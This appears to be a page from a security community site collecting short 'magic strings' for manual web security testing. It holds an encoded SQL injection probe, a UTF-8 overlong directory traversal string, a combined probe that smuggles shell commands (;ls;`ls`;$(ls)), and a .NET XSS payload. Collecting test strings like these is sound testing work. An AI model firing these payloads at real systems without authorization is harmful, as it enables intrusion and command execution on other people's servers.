Magic Strings @ The Hackers Place

ush.it

network

devel

WTF

A very descriptive title by AsmartGuy

That wrote a description about the following code.

<test>|£$%&/()=?^</test>

[discovery] SQLi Manual Test/Discovery by ascii

This is a manual test to fing SQL Injections in parameters. It uses various encoding shemes to trigger a SQL error that can be explicit or not. It works on all the mayor SQL servers including MySQL, PostgreSQL, MS SQL Server, MS Access and others.

'"%22%27%2522%2527%252522%252527%uFF22%uFF27);--''

UTF8 Directory Traversal by ascii

As seen in http://www.milw0rm.com/exploits/6229.

%c0%ae%c0%ae/%c0%ae%c0%ae/ = ../../

[discovery] Universal test by ascii

1token1>'"%22%27%2522%2527%252522%252527%uFF22%uFF27);--''%00%uFF00%FF%00token2<token3>;ls;`ls`;$(ls);<!--

.net 2005 XSS flaw by ascii

%uff1cscript%uff1ealert(1)%uff1/script%uff1e

Add an entry!

Todotext.. Tagging is a very good idea for the title, just add [category] at the beginning of the title or [category/subcategory]. Todotext..

Title

Author

Description

Data
Verify

index
Page 0

ush.it - a beautiful place
THP USH Wisec DigitalBullets TheHackersPlace network HTTP HTTPS